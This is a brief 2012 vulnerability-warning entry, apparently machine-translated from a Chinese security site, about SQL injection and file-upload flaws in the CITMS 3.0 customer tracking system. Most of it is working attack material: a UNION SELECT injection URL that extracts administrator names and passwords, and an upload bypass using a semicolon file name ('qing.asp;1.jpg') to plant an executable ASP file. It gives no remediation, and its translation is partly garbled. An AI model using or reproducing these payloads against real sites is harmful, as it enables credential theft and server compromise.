The company's customer information and tracking management system CITMS 3.0 injection and upload vulnerabilities-vulnerability warning-the black bar safety net

2012-09-19T00:00:00
ID MYHACK58:62201234962
Type myhack58
Reporter 佚名
Modified 2012-09-19T00:00:00

Description

Management system part of the function is as follows:

(1)online add, modify, delete administrators

(2)online add, modify, delete customer records, supporting HTML, etc..

(3)the front Desk recorded with the tracking function.. As well as the track record and the number of clicks on the display

Source code download:

http://www.mycodes.net/30/5238.htm

Injection:

http://www.xxx.com/citms3.0/list.asp?id=1320 union select 1,name,3,pass,,5,6,7,8,9,10,11,12,13,14,15,16 from admin

Upload

http://www.xxx.com/soft/demo/citms3.0/upload_pic.asp

Upload the qing. asp;1.jpg after the success obtained: the qing. asp;随机数 .jpg

Such as: http://www.xxx.com/qing.asp;131672.jpg